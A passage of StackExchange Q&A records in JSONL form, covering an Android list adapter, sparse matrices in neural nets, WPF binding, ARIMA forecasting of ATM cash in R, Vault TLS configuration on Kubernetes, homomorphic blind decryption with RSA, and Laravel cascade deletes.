.getSystemService(Activity.LAYOUT_INFLATER_SERVICE);\n convertView = mInflater.inflate(R.layout.list_item,parent,false);\n }\n\n ImageView imgIcon = (ImageView) convertView.findViewById(R.id.icon);\n TextView txtTitle = (TextView) convertView.findViewById(R.id.title);\n TextView txtSubTitle = (TextView) convertView.findViewById(R.id.sub_title);\n TextView txtRightTitle = (TextView) convertView.findViewById(R.id.right_title);\n\n RowItem row_pos = getItem(position);\n\n \/\/ setting the image resource and title,subtitle,Righttitle\n File imgFile = new File(row_pos.getIcon());\n\n if(imgFile.exists()){\n\n Bitmap myBitmap = BitmapFactory.decodeFile(imgFile.getAbsolutePath());\n imgIcon.setImageBitmap(myBitmap);\n }\n\n if(row_pos.getTitle() == \" \")\n txtTitle.setText(row_pos.getPhone_number());\n else\n txtTitle.setText(row_pos.getTitle());\n\n txtSubTitle.setText(row_pos.getSub_title());\n txtRightTitle.setText(row_pos.getRight_title());\n\n return convertView;\n }\n}\n<\/code>\nComment: Let's keep comments related to clarification of the post and not tangential discussion. 
Thank you.\nAnswer: In <code>ArrayAdapter<\/code> you don't need to get a reference for your list of items (in your case list of <code>RowItem<\/code>), this is not <code>ArrayAdapter<\/code> was made for, all you need is to override <code>getView<\/code> and the <code>ArrayAdapter<\/code> will handle the list internally for you, here is how it should look like:\n<code>public class CustomAdapter extends ArrayAdapter<RowItem> {\n\n public CustomAdapter(Context context, int resourceId,\n ArrayList<RowItem> items) {\n super(context, resourceId, items);\n }\n\n @Override\n public View getView(int position, View convertView, ViewGroup parent) {\n if (convertView == null) {\n LayoutInflater mInflater = LayoutInflater.from(parent.getContext());\n convertView = mInflater.inflate(R.layout.list_item, parent, false);\n }\n\n ImageView imgIcon = (ImageView) convertView.findViewById(R.id.icon);\n TextView txtTitle = (TextView) convertView.findViewById(R.id.title);\n TextView txtSubTitle = (TextView) convertView.findViewById(R.id.sub_title);\n TextView txtRightTitle = (TextView) convertView.findViewById(R.id.right_title);\n\n RowItem row_pos = getItem(position);\n\n \/\/ setting the image resource and title,subtitle,Righttitle\n File imgFile = new File(row_pos.getIcon());\n\n if (imgFile.exists()) {\n\n Bitmap myBitmap = BitmapFactory.decodeFile(imgFile.getAbsolutePath());\n imgIcon.setImageBitmap(myBitmap);\n }\n\n if (row_pos.getTitle() == \" \")\n txtTitle.setText(row_pos.getPhone_number());\n else\n txtTitle.setText(row_pos.getTitle());\n\n txtSubTitle.setText(row_pos.getSub_title());\n txtRightTitle.setText(row_pos.getRight_title());\n\n return convertView;\n }\n }\n<\/code>\n","meta":{"source":"stackoverflow","title":"Why i am not able to view my Listview in android?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Usage of Sparse matrix in neural nets\n\nQuestion: I have started doing a project named Talking Data User Demographics. In this project i need to find the gender and age group of a person whose phone data is provided to me. In the datset given to me i could find only phone model and phone brand for almost 70% of the data and remaining 30% has events,event labels, location,many other features includeing model and brand. So, i thought of building a model seperately for devices with events and devices without evnts. As a part of finding correct model i have used various algorithms. When i tried neural nets i have got less log loss for devices with out events so, i thought of trying the same for devices with events also but it is giving the error \"sparse matrices are not supported.\" But if it is so it is runnning fine when i have the model for devices with out events. Below i have attached a snippet as a proof of what i have told, please help me in understanding this any suggestion would be appreciated.\nThe file attached contain a code which runs the code perfectly even when sparse matrices are used in model.fit(). 1st image\nNow in the below attached file it is giving the error when sparse matrix are passed to model.fit()second image\nplease gothrough the entire code for best reference.code snippet\n3\nComment: Please directly insert your code snippet, so your question can be later better found by someone having the same problem.\nComment: Thanks for the suggestion, I have added the code snippet please go through this and help me if you are aware of the solution.\nAnswer: Just a suggestion: Do not use a sparse matrix in a neural network as such, as it will provide bad results. 
Just transform your sparse matrix using PCA before running NN. You have for example PCA in scikit-learn with the option whitening which can be useful also for the gradient descent. \nIn your example you want to compare two models run with two different datasets. Two different models and two different data sets may provide completely different results. It makes no sense to compare them.\nComment: Thanks for the suggestion, I have understood what you have told me, But i have a doubt that why it is giving me an error when sparse matrices are used in NN while it hasn't given the error when used the above sparse matrix i.e you can see in the code snippet that it worked fine for 1st model and it's giving error for second model , I want to know what's the difference between them if possible how can i correct it.\nComment: Which page of your snippet exactly? Your code is huge.\nComment: NN model in 36th page is running perfectly even with sparse matrices and NN model at 38th page is raising the error.\nComment: In the two files you have two different training sets and two different models in each. That is difficult to compare.Try applying the same model once to a dataset and secondly on the other dataset and see the result.\nComment: Though the two models are different and training sets are different the error it is giving is it can't handle sparse matrix right if it is so how the 1st model has handeled the sparse matrix??\nComment: The error states that SparseTensor cannot be converted to Tensor. Your snippet is an image, so you are the only one who has access to the code. Just check which line of your code provides the error and tel us.\nComment: Hi mam i am sorry for not providing you the code earlier,here is the link for the code https:\/\/drive.google.com\/open?id=1Kjkv_JqgmDJoQNfz1kouWXQgDbhaN8IY\nComment: Please click on the link code will open if not in the page opened you will find the dowload option please download it and then you can use google colab to open. please help me in understaning the error.\nComment: OK. Please tell me what did you try in order to find the line which gives the error? Did you have difficulties in finding that line, and if it is the case, which were they?\nComment: No, it is cleaarly stating the error line that SparseTensor cannot be converted to Tensor i.e from that i have understood that usage of sparse matrix in model.fit() is causing that error so i haveconverted that entire sparse to dense and executed model has run without giving any error but i could find that the logloss that i have obtained is more. So, i thought it would give less log loss if my model runs on sparse matrix so i want to know why only this mmodel is giving error when sprase is passes while the previous worked perfectly fine.\nComment: I have done my model 1 with both sparse and dense and checked the logloss values sparse matrix has given the best so, I think even in the second model that would be the case and so trying that with sparse which is giving the error\nComment: Well, two different models and two different data sets may provide completely different results. It makes no sense to compare them, moreover without having acess to the data.\nComment: I have sent the link of code through which you can acces it. 
please check this link drive.google.com\/open?id=1Kjkv_JqgmDJoQNfz1kouWXQgDbhaN8IY\n","meta":{"source":"stackoverflow","title":"Usage of Sparse matrix in neural nets","dup_signals":{}},"subset":"stackexchange"} +{"text":"Binding from a property of each item inside an ItemsControl to a property of an object outside the ItemsControl\n\nQuestion: I have an ItemsControl, and a Button outside the ItemsControl. Each item inside the ItemsControl has a dependency property called \"MyProperty\" (defined in the code-behind).\nI would like to set the IsEnabled property of the Button to false when at least one of the items in the ItemsControl has the MyProperty property set to 5. (of course this is just a stupid example of a more complicated situation)\nI tried by means of a data trigger, but with no luck:\nXAML:\n<code><Window x:Class=\"cancellami24.MainWindow\"\n xmlns=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation\"\n xmlns:x=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\"\n Title=\"MainWindow\" Height=\"350\" Width=\"525\">\n\n <Window.Resources>\n <Style x:Key=\"MyStyle\" TargetType=\"{x:Type ContentPresenter}\">\n <Style.Triggers>\n <DataTrigger Binding=\"{Binding Path=MyProperty}\" Value=\"5\">\n <Setter Property=\"IsEnabled\" TargetName=\"MyButton\" Value=\"False\" \/><!--error on TargetName-->\n <\/DataTrigger>\n <\/Style.Triggers>\n <\/Style>\n <\/Window.Resources>\n\n <Grid>\n <Grid.RowDefinitions>\n <RowDefinition \/>\n <RowDefinition \/>\n <\/Grid.RowDefinitions>\n\n <ItemsControl x:Name=\"MyListBox\" Grid.Row=\"0\" ItemContainerStyle=\"{StaticResource MyStyle}\">\n <ItemsControl.ItemTemplate>\n <DataTemplate>\n <TextBlock Text=\"{Binding Path=MyProperty, UpdateSourceTrigger=PropertyChanged, Mode=OneWay}\" \/>\n <\/DataTemplate>\n <\/ItemsControl.ItemTemplate>\n <\/ItemsControl>\n\n <Button x:Name=\"MyButton\" Grid.Row=\"1\" Click=\"MyButton_Click\"\/>\n <\/Grid>\n<\/Window>\n<\/code>\nCode-behind:\n<code>using System.Collections.ObjectModel;\nusing System.Windows;\n\nnamespace cancellami24\n{\n public partial class MainWindow : Window\n {\n private readonly ObservableCollection<MyItem> myCollection = new ObservableCollection<MyItem>();\n\n public MainWindow()\n {\n InitializeComponent();\n\n myCollection.Add(new MyItem(1));\n myCollection.Add(new MyItem(2));\n myCollection.Add(new MyItem(3));\n MyListBox.ItemsSource = myCollection;\n }\n\n private void MyButton_Click(object sender, RoutedEventArgs e)\n {\n myCollection[2].SetValue(MyItem.MyPropertyProperty, 5);\n }\n }\n\n public class MyItem : DependencyObject\n {\n public static readonly DependencyProperty MyPropertyProperty = DependencyProperty.Register(\"MyProperty\", typeof(int), typeof(MyItem));\n\n public MyItem(int propertyValue)\n {\n SetValue(MyPropertyProperty, propertyValue);\n }\n }\n}\n<\/code>\nAnswer: You need custom converter to solve it\n<code>public class MyConverter : IValueConverter\n{\n bool flag = false;\n var collection = value as ObservableCollection<MyItem>();\n if(collection==null) return flag;\n foreach (var item in collection)\n {\n if (item.MyProperty==5)\n {\n flag = true;\n break;\n }\n }\n return flag;\n} \n<\/code>\nAdd MyConverter to your App.xaml\n<code><local:MyConverter x:key=\"MyConverter\"\/>\n<\/code>\nXaml:\n<code><Button x:Name=\"MyButton\" IsEnabled=\"{Binding ElementName=MyListBox, Path=ItemsSource, Converter={StaticResource MyConverter}}\"\/>\n<\/code>\nComment: I want that the IsEnabled property of the button changes whenever I change a MyProperty property in one of 
the items. I've tested your solution (by fixing it a bit), and unfortunately the IsEnabled property is updated only once at the application start.\n","meta":{"source":"stackoverflow","title":"Binding from a property of each item inside an ItemsControl to a property of an object outside the ItemsControl","dup_signals":{}},"subset":"stackexchange"} +{"text":"ATM daily Cash forecasting\n\nQuestion: I want to do forecasting for ATM on daily transcation data.\nI have data set for sep 2013 to feb 2014 and i want to validate it for march 2014.\nso for this i had using forecast package in R and fit model ARIMA using ARIMA() function. \nI have data with trans_date ,transaction_amount, weekdays and holiday_flag.\nI fitted ARIMA model with regressor variable weekdays but in final output my forecast value not matching with actual value for march month. so please help me on this. I share with you data set which i used in my forecasting. In Sheet one there is train data and in sheet two there is validate data.\nIn this link R code is there which i used...\nhttps:\/\/docs.google.com\/document\/d\/1mPo0D-iTK5d_b0W5gG2lBmMA95__eG825fFo2yrSyIg\/edit\nIn this link dataset is there...\nhttps:\/\/docs.google.com\/spreadsheets\/d\/1-LJhxzfpMkeCwLf129D9-q5ZkGhISqrDQWCw30UE9TE\/pubhtml\nhelp on this really very appreciated....\nComment: You have some days in the dataset that have no values, e.g. Oct-30 - Nov-2. Bank panic? :)\nhttp:\/\/apps.axibase.com\/chartlab\/0baf81ba\nComment: yes i was ignor that date beacause there is zero transaction amount\nComment: how would be calculated those forecast value\nComment: Zero is a valid number. It could be a scheduled repair or bank office closing date. This type of exceptions can impact the quality of forecasting to a great extent. I used automated holt-winters. I let the system crunch numbers and identify HW parameters that best fit test data. For your data it was Alpha=0.2, Beta=0.3, Gamma=0.1. Period = 4 weeks. Data was averaged over 2 days to smooth out spikes.\nComment: did you verify your forecast value with march data which is present in sheet 2. Can you shared your code for my reference\nComment: how would you capture the seasonality? seasonality is present in weekdays.\nComment: Season is Gamma = 0.1. March data is graphed in silver color on the referenced time chart. I didn't write any code, it was produced by a machine. The machine recomputes the most fitting forecast parameters on new inputs.\nComment: Thanks Sergie for your responce, But i want to do this in R. Can any body suggest the another way to do in R\nComment: Sure, that's why I didn't post my response as an answer. Code is definitely better for learning things.\nComment: I am expecting the above question's answer from sir RandomHyndman\nAnswer: You don\u00b4t need to use the weekdays or weekend dummies if you use a seasonal Arima. You also need to treat the zero value as NA because otherwise it would be a non repetitive outlyier. The question is if you use a stationary or non-stationary model. Cash outlays sometimes are best treated as log, so I put a lambda = 0 for Box - Cox transformation. 
I enclosed code for both stationary and non-stationary model.\n<code>library(forecast)\n#I put an NA in 9\/1\/2014\namount <- ts(cash$Amount,start = 1, frequency = 7)\namount <- na.interp(amount, lambda = 0)\nfitar <- auto.arima(amount, xreg = cash$Holydays, lambda = 0 , stepwise = FALSE)\nfcstar <- forecast(fitar, h=30, xreg = rep(0,30))\nplot(fcstar)\nfitar1 <- auto.arima(amount, D=1, xreg = cash$Holydays, lambda = 0 , stepwise = FALSE)\nfcstar1 <- forecast(fitar1, h=30, xreg = rep(0,30))\nplot(fcstar1)\n<\/code>\nComment: Thanks Acoustesh for your response, but from this method still seasonality not capture very well. if we validate forecast value with actual data its not match ,variation is there between these value.\nAnswer: The data are collected daily, which would suggest a frequency of 365. However, what evidence do you have for \"seasonality\" in the data? I don't see any when I plot them.\n<code>library(forecast)\n# data through Feb\ndatFit <- read.csv(\"atm_fit.csv\")\n# convert 0 to NA\ndatFit$tot_amount[datFit$tot_amount==0] <- NA\nnFit <- length(datFit$tot_amount)\nbeginDay <- (as.Date(\"2013-09-01\") - as.Date(\"2013-01-01\"))\nt1 <- ts(datFit$tot_amount, start=c(2013,beginDay), freq=365)\nplot.ts(t1)\n<\/code>\n\nThe other issue is that your values are all greater than zero, so perhaps a log-transformation would be more appropriate (or use a non-Gaussian time series model). Anyway, ignoring that for now let's fit an ARIMA model.\n<code>tsMod <- auto.arima(t1, xreg=datFit$Holiday_flag)\nsummary(tsMod)\n\nSeries: tt \nARIMA(3,0,0) with non-zero mean \n\nCoefficients:\n ar1 ar2 ar3 intercept datFit$Holiday_flag\n 0.2669 0.1611 0.1102 162648.08 -11568.59\ns.e. 0.0757 0.0787 0.0772 11232.19 23829.38\n\nsigma^2 estimated as 4.711e+09: log likelihood=-2159.72\nAIC=4331.44 AICc=4331.95 BIC=4350.36\n\nTraining set error measures:\n ME RMSE MAE MPE MAPE MASE ACF1\nTraining set -0.0005199295 0.5135824 0.3887894 -0.2049583 3.350222 0.8049315 0.005689687\n<\/code>\nSo, it looks like an ARMAX(3,0,0) model is the \"best\". Now let forecast the March values and examine them.\n<code># get March data\ndatFore <- read.csv(\"atm_fore.csv\")\nnFore <- length(datFore$tot_amount)\n# forecast March values\nff <- forecast(tsMod, nFore, xreg=rep(0,nFore))\n# plot all data together\ntf <- ts(c(datFit$tot_amount,datFore$tot_amount), start=c(2013,beginDay), freq=365)\nplot.ts(tf)\n# fitted values\npoints(ff$fitted, pch=16, col=\"blue\")\n# forecasts\npoints(ff$mean, pch=16, col=\"red\")\n<\/code>\n\nSo, indeed you have a pretty lousy forecast model that basically reverts to the mean. There is no seasonality in the data, so you should not expect anything from the model either.\n","meta":{"source":"stackoverflow","title":"ATM daily Cash forecasting","dup_signals":{}},"subset":"stackexchange"} +{"text":"Hashicorp Vault error - Client sent an HTTP request to an HTTPS server\n\nQuestion: Having trouble deploying Hashicorp Vault on kubernetes\/helm. Can't get vault to work at all. I've really tried changing almost all the parameters I could and still can't get it to work and I don't know where the issue lies exactly.\nThe error I get is mainly based on <code>Error Checking Seal status\/Client sent an HTTP request to an HTTPS server.<\/code>\nIf I set <code>tls_disable=true<\/code> inside the .Values.ha.config then I get an error that vault is sealed but I still can't view the UI... I feel like deploying vault has been bipolar and it sometimes works and sometimes doesn't. 
Then I can't replicate where the bug lied either. This has been a headache.\nHere is my values.yaml file:\n<code>server:\n enabled: true\n ingress:\n enabled: true\n annotations:\n cert.<issuer>.cloud\/issuer: <intermediate-hostname>\n cert.<issuer>.cloud\/secretname: vault-server-tls\n cert.<issuer>.cloud\/purpose: managed\n dns.<issuer>.cloud\/class: <class>\n dns.<issuer>.cloud\/dnsnames: \"<hostname>\"\n dns.<issuer>.cloud\/ttl: \"600\"\n hosts:\n - host: \"vault.<hostname>\"\n paths: []\n tls:\n - secretName: vault-server-tls\n hosts:\n - vault.<hostname>\n extraVolumes:\n - type: secret\n name: vault-server-tls\n service:\n enabled: true\n port: 8200\n targetPort: 443\n ha:\n enabled: true\n replicas: 3\n raft:\n enabled: true\n config: |\n ui = true\n listener \"tcp\" {\n tls_disable = false\n address = \"[::]:8200\"\n cluster_address = \"[::]:8201\"\n tls_cert_file = \"\/vault\/userconfig\/vault-server-tls\/tls.crt\"\n tls_key_file = \"\/vault\/userconfig\/vault-server-tls\/tls.key\"\n tls_client_ca_file = \"\/vault\/userconfig\/vault-server-tls\/vault.ca\"\n }\n storage \"raft\" {\n path = \"\/vault\/data\"\n }\n config: |\n ui = true\n listener \"tcp\" {\n tls_disable = false\n address = \"[::]:443\"\n cluster_address = \"[::]:8201\"\n tls_cert_file = \"\/vault\/userconfig\/vault-server-tls\/tls.crt\"\n tls_key_file = \"\/vault\/userconfig\/vault-server-tls\/tls.key\"\n tls_client_ca_file = \"\/vault\/userconfig\/vault-server-tls\/vault.ca\"\n tls_require_and_verify_client_cert = false\n }\n storage \"consul\" {\n path = \"vault\"\n address = \"HOST_IP:8500\"\n }\n disable_mlock = true\n\nui:\n enabled: true\n serviceType: LoadBalancer\n externalPort: 443\n targetPort: 8200\n<\/code>\nEDIT: I'm now able to view the UI from the LoadBalancer but not from the hostname set in <code>dns.<issuer>.cloud\/dnsnames: \"<hostname>\"<\/code> under the ingress.annotations\nStill get the error but can view the UI via the LoadBalancer: <code>Readiness probe failed. Error unsealing: Error making API request. URL: PUT http:\/\/127.0.0.1:8200\/v1\/sys\/unsealCode: 400. Raw Message: Client sent an HTTP request to an HTTPS server.<\/code>\nComment: Did you see [this similar question](https:\/\/stackoverflow.com\/questions\/63564594\/hashicorp-vault-client-sent-an-http-request-to-an-https-server-readiness-pro)? Is it helpful? How exactly did you set up your cluster and which version of Kubernetes did you use? It is important for reproducing your problem.\nComment: @Miko\u0142ajG\u0142odziak Yes I've read that question. Doesn't help entirely. \nI'm using Kubernetes version 1.21 with my cluster set up on AWS. How would I change the VAULT_ADDR in the values.yaml file? The other issue is I set up the hostname in the annotations but can't view that address. Have no issues viewing the UI with the LoadBalancer address. I've used these exact same annotations for another deployment of ArgoCD and it worked perfectly fine.\nComment: You said: \"How would I change the VAULT_ADDR in the values.yaml file?\" Maybe you can [Define an environment variable for a container](https:\/\/kubernetes.io\/docs\/tasks\/inject-data-application\/define-environment-variable-container\/#define-an-environment-variable-for-a-container)? For other issue please create separate question. 
Is this doc helpful for you?\nAnswer: As you mentioned you faced issued of <code>Error Checking Seal status\/Client sent an HTTP request to an HTTPS server & vault is sealed<\/code>\nOnce you have deployed the vault using the helm chart you have to unseal the vault using the CLI first time and after that UI will be available to use.\nReference document : https:\/\/learn.hashicorp.com\/tutorials\/vault\/kubernetes-raft-deployment-guide?in=vault\/kubernetes#initialize-and-unseal-vault\nGet the list of pods\n<code>kubectl get pods --selector='app.kubernetes.io\/name=vault' --namespace=' vault'\n<\/code>\nExec into the pods\n<code>kubectl exec --stdin=true --tty=true vault-0 -- vault operator init\n\nkubectl exec --stdin=true --tty=true vault-0 -- vault operator unseal\n<\/code>\nonce you will unseal the vault your PODs status will get changed to 1\/1 in Ready instead of 0\/1\nComment: Not necessarily. I've been able to view the UI and unseal from there before as well. For some reason I can view the UI via the LoadBalancer now, but not from the hostname I set in the ingress with the cert being attached and valid for the hostname.\n","meta":{"source":"stackoverflow","title":"Hashicorp Vault error - Client sent an HTTP request to an HTTPS server","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can RSA be securely used for \"blind decryption\"?\n\nQuestion: Assume we have the following setup:\n\nA client with trusted storage and computing capabilities (e.g. a smartcard)\nA server with trusted computing and short-term storage capabilities (e.g. RAM + CPU, possibly with something like Intel SGX). The server has no trusted large-scale long-term storage capabilities and may only store small amounts of data confidential and integrity protected (like the HTTPS private key).\n\nThe problem is: The server should be able to be shut-down and started-up, no passwords should be involved and the server has no HSM, yet the server should be able to provide somewhat secure access to some data without the clients needing to decrypt it themselves (for complexity reasons). So the storage need to be encrypted and the transfer (-> TLS) as well.\n\nThe solution is now (what I call it): blinded decryption.\nThe server uses some homomorphic encryption scheme (e.g. EC-ElGamal or RSA) with the message space $\\mathcal M$. He chooses a random $k\\in \\mathcal M$ and uses $H(k)$ ($H:\\mathcal M \\rightarrow \\{0,1\\}^{256}$) as the key for the authenticated encryption of the data. The server now either stores the (asymmetric) encryption of $k$, called $\\mathcal E(k)$ in his trusted area of the drive(s) or may store it in an untrusted section (with back-ups) if server authentication is required and the private key for this authentication is already stored in the trusted area.\nFor the temporary unlock of the encrypted data, the server loads $\\mathcal E(k)$. Then he blinds it using some operation $f(\\cdot,\\cdot)$ (multiplication for ElGamal and RSA, addition for EC-ElGamal) using some random $r\\in \\mathcal M$ as $c=f(\\mathcal E(k),\\mathcal E(r))=\\mathcal E(g(k,r))$ with $g(\\cdot,\\cdot)$ being the \"inner homomorphism\" (same as $f$ in many cases). The $r$ is kept available in trusted short-term memory and the $c$ is sent to the client.\nThe client decrypts $c$ using his trusted device and returns $c'=g(k,r)$ to the server. 
Finally the server unblinds $c'$ using his $r$ and uses the obtained $k$ to derive $H(k)$ and allow access to the data.\n\nNow (finally) the question:\nGiven the above and standard assumptions (RSA-assumption, DDH-assumption in ECC and $\\mathbb Z_p^*$,$H$ is a random oracle, the symmetric encryption is secure and authenticated,...) is it safe to instantiate $\\mathcal E$ with textbook RSA?\n\nAs pointed out in the comments, every good question about \"is this secure?\" requires a threat model, so here's mine:\nThe security of the whole protocol is broken if an attacker is able to learn the secret symmetric key $H(k)$ while it's valid. The attacker may not compromise the server (i.e. he can't control\/spy on RAM \/ CPU and may not learn the stored $\\mathcal E(k)$). An attacker not breaking into the server may have successfully attacked the client (except for the trusted device) and he may be able to completely modify and read the network traffic. I think an attacker without having broken into the server may be computationally unbounded.\n\nIf not clear until now, the instantiation of $\\mathcal E(k)$ is $\\mathcal E(k):=k^e \\bmod N$ with $e,N$ being standard RSA parameters.\nComment: $\\mathcal E(k)$ is RSA KEM if $\\mathcal E$ = RSA, right? So the encryption\/decryption should be no issue...\nComment: Two observations: a) the scheme relies on $\\mathcal E$ being homomorphic, but standard non-textbook RSA is not; thus the scheme does not allow decryption with standard non-textbook RSA, thus its security is moot; first define the variant of RSA you consider for the security analysis. b) define your security goals and threat model, in particular if an adversary impersonating the server to the client (which seems trivial since the server has no credential), or actively eavesdropping connection between actual client and server, are considered a break.\nComment: @fgrieu a) I don't like it either having to rely on textbook RSA. I want to learn by this question if I could allow fall-back to RSA in case EC-ElGamal isn't an option. The problem is I don't have any other (better) options. I could use an IND-CCA2 scheme and just store the encrypted key on the server, but then the client would have to send the key *in clear* over the wire (or maybe TLS but the attacker could still break by compromising the client *or* the server and could still break the protocol with storage theft). I can't afford requiring a HSM($$$) which would be the most secure solution.\nComment: (continued), obviously (lacking better options) $\\mathcal E(k):=k^e\\bmod N$ if we decide to use textbook RSA. b) I've added the security model to the question. In short: the scheme is broken if the attacker learns the key without breaking into the server.\nComment: Some notes: It seems the server must store the client's public key in integrity-trusted storage, and $\\mathcal E(k)$ in integrity+confidentiality-trusted storage, despite the last sentence in second bullet. $\\;$ The client seems to need to know $H(k)$, and it is not told how; that part of the exchange might interfere with the rest.\nComment: @fgrieu, thank you. The public key(s) of the client are meant to be embedded into certificates signed by a smart-card based local CA (which also uses a fancy OID in the cert), so they are integrity protected (to some extend). The point of the whole protocol is that the client *never* learns $H(k)$ to prevent one leak point (one < two). 
Of course this screws things up as an attacker being able to just query $\\mathcal E(k)$ would have \"won the jackpot\". You need to protect *some* information, but this is always the case when you can't afford a HSM and want to perform remote decryption.\nComment: (continued) Usually this means the private TLS keys for the web- \/ mailserver, but I will change the bullet to correctly reflect the (new) threat model. In practice I'd require a mutually authenticated TLS session for the protocol so the second approach in the above was already in my mind when designing.\nAnswer: Let's try to simplify and abstract your protocol a bit. Instead of your server and client, we just have two parties, let's call them Sally and Charlie.\n\nCharlie has a key pair $K = (K_i, K_u)$ for a suitable asymmetric cryptosystem $\\mathcal E$. We assume that this cryptosystem is partially homomorphic, such that $\\mathcal E_K(a) \\otimes \\mathcal E_K(b) = \\mathcal E_K(a \\odot b)$, where $\\otimes$ and $\\odot$ are two group operations.\nSally knows the public half $K_u$ of Charlie's key pair, so that she can compute $\\mathcal E_K(a)$ given a plaintext $a$, but not the private half $K_i$ that would let her compute $a$ from $\\mathcal E_K(a)$.\nSally has a message $\\mathcal E_K(m)$ encrypted with Charlie's key pair, and wants to decrypt it without revealing the decrypted message $m$ to Charlie (or to anyone who might impersonate him).\nCharlie wants to help Sally decrypt her message, but does not wish to reveal his private key $K_i$, or anything equivalent to it, to Sally (or to anyone who might impersonate her).\n\nThe protocol you've suggested amounts to Sally picking a random element $r$ uniformly from the group of all possible plaintexts, encrypting it using $K_u$ to get $\\mathcal E_K(r)$, and sending $\\mathcal E_K(m) \\otimes \\mathcal E_K(r) = \\mathcal E_K(m \\odot r)$ to Charlie. Charlie then decrypts the message, and sends $m \\odot r$ back to Sally, who applies the group inverse $r^{-1}$ of $r$ to obtain $m = (m \\odot r) \\odot r^{-1}$:\n\n$S:\\ $choose $r$ uniformly at random, compute $E_K(r)$ and $r^{-1}$;\n$S \\to C:\\ \\mathcal E_K(m) \\otimes \\mathcal E_K(r) = \\mathcal E_K(m \\odot r)$;\n$C:\\ $decrypt $\\mathcal E_K(m \\odot r)$ to get $m \\odot r$;\n$C \\to S:\\ m \\odot r$;\n$S:\\ $compute $m = (m \\odot r) \\odot r^{-1}$.\n\nThe first security claim (that Charlie cannot learn $m$) should be easy to prove, regardless of the specific cryptosystem used. Since the plaintexts form a group, and $r$ is chosen uniformly at random from that group, $m \\cdot r$ is also uniformly distributed, and so reveals no information about $m$ to anyone who doesn't know $r$. Indeed, even if Sally repeats the protocol with several different random values $r_i$, and so reveals $m \\odot r_i$ to Charlie, this will give him no additional information as long as all the $r_i$ are uniformly chosen and independent of $m$.\nThe tricky part is the second claim, and especially the part about Charlie not revealing \"anything equivalent to $K_i$\" to Sally. 
After all, in the protocol as described, Charlie is acting as an unrestricted decryption oracle!\nIt seems to me that, for this protocol to make sense at all, we need at least the following assumptions:\n\nSally cannot be compromised in any manner that would directly reveal $m$ to the attacker; she can only be made to disclose $\\mathcal E_K(m)$.\nAccess to Charlie is strictly limited, so that even if an attacker obtains $\\mathcal E_K(m)$, they cannot simply query Charlie for $m$.\n\nThe latter assumption may indeed make sense in your scenario, where Charlie is physically connected to Sally (and only intermittently so connected, being securely stored at other times), if we also assume that Sally is resistant to active compromise (i.e. she may certain data items, but an attacker cannot modify her behavior). That's a pretty huge assumption in practice, but if you're willing to make it, the protocol described above seems like it should work.\n(That said, if you're really willing to make all those assumptions, why not simply have Charlie store $m$ and provide it directly to Sally upon request? I'm having some trouble coming up with a reasonable attack scenario where that wouldn't be secure, yet the protocol above would be.)\nComment: I *might* well be missing a reasonable use case for this protocol, though; it's getting late here and I really should get some sleep. What does seem clear to me, though, is that the ability to use Charlie as a decryption oracle is a major and rather fundamental security issue here.\nComment: The _part about Charlie not revealing \"anything equivalent to Ki\"_ does not seem so much of a problem to me: although we do not have a proof of that, it is widely accepted that in textbook RSA, temporary access to a decryption oracle can not allows extraction of a private key, or otherwise help the decryption of random messages drawn after access to the decryption oracle has stopped.\nComment: I would say that the protocol works, in the sense that if Sally is able to store $\\mathcal E(k)$ and keep it secret, she can get back to $k$, thus $H(k)$, without revealing these, with the help of Charlie; further, verifying what Charlie returns, which is easy, prevents an active adversary from messing with the recovered $k$. $\\;$ However I fail to see why the server does not keep $k$ or $H(k)$ rather than $\\mathcal E(k)$; if we assume Charlie does its task without any check or limit in time, that seems to achieve the same result, in a much simpler way.\nComment: @IlmariKaronen, if Charlie just sends $m$ every time Sally needs it, Charlie *knows* $m$ which increases the attack surface. The point of the protocol is to make the best out of the situation at hand (-> no HSM :( ) So while it would work, it would be \"worse\" in terms of security than the given protocol.\nComment: @fgrieu, the server *could* just store $H(k)$, but this increases the attack surface as there *may* be the case as there are (some, not many) cases where the above protocol still is secure whereas simply storing $H(k)$ would fail (f.ex. 
if the data is at rest, an attacker breaks the confidentiality but Charlie notices that before accepting any unlock queries and starts re-newing keys)\n","meta":{"source":"crypto.stackexchange","title":"Can RSA be securely used for \"blind decryption\"?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Laravel 4.0 cascade delete and polymorphic relations\n\nQuestion: I am using the Eloquent plymorphic relations and the <code>ON DELETE CASCADE<\/code> option of mysql, and am afraid of how my data will stay consistent over time. Let me explain:\nIf I have a model Room which contains furnitures of several types (morphMany of <code>Table<\/code>, <code>Chair<\/code>, <code>Couch<\/code>...), and that I decide to delete it, his related furnitures won't get deleted.\nTo solve this issure I handled the deletion of the related furnitures in the delete event of the <code>Room<\/code> model, but this event won't necessarily get fired all the time.\nLet's say that I have an other model called <code>House<\/code>, containing several rooms (hasMany). If I decide to delete it, its related models will deleted by mysql with the <code>ON DELETE CASCADE<\/code> option. I will then stay with data in my tables <code>tables<\/code>, <code>chairs<\/code>, <code>couchs<\/code> that are not relevant anymore, and not related to any row of the <code>rooms<\/code> table anymore.\nSo what is the best way to keep a database consistent with <code>ON DELETE CASCADE<\/code> and the Eloquent's polymorphic relations?\nAnswer: If you're using the raw database (cascading) approach, that bypasses Eloquent and it becomes impossible to do what you want.\nSet up a deleted event for House which iterates through all its Rooms and deletes those, which again triggers the Room's deleted events.\nComment: So if I understand what you say, the ability to put cascade delete in the migrations should not actually be used ever, as all the deletion should be handled by Eloquent only. 
